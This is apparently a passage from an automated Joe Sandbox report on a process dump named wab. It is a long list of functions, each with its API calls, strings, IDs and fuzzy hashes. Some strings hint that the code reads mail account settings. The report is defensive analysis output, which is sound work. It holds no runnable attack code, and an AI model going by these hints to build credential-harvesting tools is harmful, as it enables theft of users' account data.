                                          • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: strlen$_mbscat
                                          • String ID: 3CD
                                          • API String ID: 3951308622-1938365332
                                          • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                          • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                          • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memset
                                          • String ID: rows deleted
                                          • API String ID: 2221118986-571615504
                                          • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                          • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                          • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                          • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                          • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                          • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                          • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                          • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                          • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                          • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                          • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                          • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                          • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                          APIs
                                          • __allrem.LIBCMT ref: 00425850
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                          • __allrem.LIBCMT ref: 00425933
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                          • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                          • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                          • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                          APIs
                                          Strings
                                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                          • too many SQL variables, xrefs: 0042C6FD
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                          • API String ID: 2221118986-515162456
                                          • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                          • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                          • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                          • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                          APIs
                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                          • memset.MSVCRT ref: 004026AD
                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                            • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                          • LocalFree.KERNEL32(?), ref: 004027A6
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                          • String ID:
                                          • API String ID: 1593657333-0
                                          • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                          • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                          • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                          • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                          APIs
                                          • memset.MSVCRT ref: 0040C922
                                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Message$MenuPostSendStringmemset
                                          • String ID:
                                          • API String ID: 3798638045-0
                                          • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                          • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                          • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                          • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                          APIs
                                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                          • strlen.MSVCRT ref: 0040B60B
                                          • atoi.MSVCRT ref: 0040B619
                                          • _mbsicmp.MSVCRT ref: 0040B66C
                                          • _mbsicmp.MSVCRT ref: 0040B67F
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                          • String ID:
                                          • API String ID: 4107816708-0
                                          • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                          • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                          • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                          • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                          • String ID:
                                          • API String ID: 1886415126-0
                                          • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                          • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                          • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                          • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: strlen
                                          • String ID: >$>$>
                                          • API String ID: 39653677-3911187716
                                          • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                          • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: @
                                          • API String ID: 3510742995-2766056989
                                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                          APIs
                                          • strlen.MSVCRT ref: 0040797A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                            • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                            • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                            • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                          • memcpy.MSVCRT ref: 004079DD
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocstrlen
                                          • String ID:
                                          • API String ID: 1171893557-0
                                          • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                          • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                          • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                          • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: C@$mail.identity
                                          • API String ID: 1439213657-721921413
                                          • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                          • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                          APIs
                                          • memset.MSVCRT ref: 00406640
                                            • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                            • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                            • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                          • memcmp.MSVCRT ref: 00406672
                                          • memcpy.MSVCRT ref: 00406695
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset$memcmp
                                          • String ID: Ul@
                                          • API String ID: 270934217-715280498
                                          • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                          • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                          • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                          • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                          APIs
                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                            • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                          • sprintf.MSVCRT ref: 0040B929
                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                          • sprintf.MSVCRT ref: 0040B953
                                          • _mbscat.MSVCRT ref: 0040B966
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                          • String ID:
                                          • API String ID: 203655857-0
                                          • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                          • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                          • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                          • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                          • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                          APIs
                                            • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                          Strings
                                          • recovered %d pages from %s, xrefs: 004188B4
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                          • String ID: recovered %d pages from %s
                                          • API String ID: 985450955-1623757624
                                          • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                          • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                          • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                          • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _ultoasprintf
                                          • String ID: %s %s %s
                                          • API String ID: 432394123-3850900253
                                          • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                          • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                          APIs
                                          • memset.MSVCRT ref: 00409919
                                          • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: N\@
                                          • API String ID: 568519121-3851889168
                                          • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                          • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                          • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                          • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                          APIs
                                          • LoadMenuA.USER32(00000000), ref: 00409078
                                          • sprintf.MSVCRT ref: 0040909B
                                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                          • String ID: menu_%d
                                          • API String ID: 1129539653-2417748251
                                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                          APIs
                                          Strings
                                          • failed memory resize %u to %u bytes, xrefs: 00411706
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _msizerealloc
                                          • String ID: failed memory resize %u to %u bytes
                                          • API String ID: 2713192863-2134078882
                                          • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                          • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                          • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                          • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                          APIs
                                            • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                          • strrchr.MSVCRT ref: 00409808
                                          • _mbscat.MSVCRT ref: 0040981D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileModuleName_mbscatstrrchr
                                          • String ID: _lng.ini
                                          • API String ID: 3334749609-1948609170
                                          • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                          • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                          • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                          • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                          APIs
                                          • _mbscpy.MSVCRT ref: 004070EB
                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                          • _mbscat.MSVCRT ref: 004070FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscat$_mbscpystrlen
                                          • String ID: sqlite3.dll
                                          • API String ID: 1983510840-1155512374
                                          • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                          • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                          APIs
                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString
                                          • String ID: A4@$Server Details
                                          • API String ID: 1096422788-4071850762
                                          • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                          • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                          • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                          • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                          • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                          • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                          • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLocalmemcpymemsetstrlen
                                          • String ID:
                                          • API String ID: 3110682361-0
                                          • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                          • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                          • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                          • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                          • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                          • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
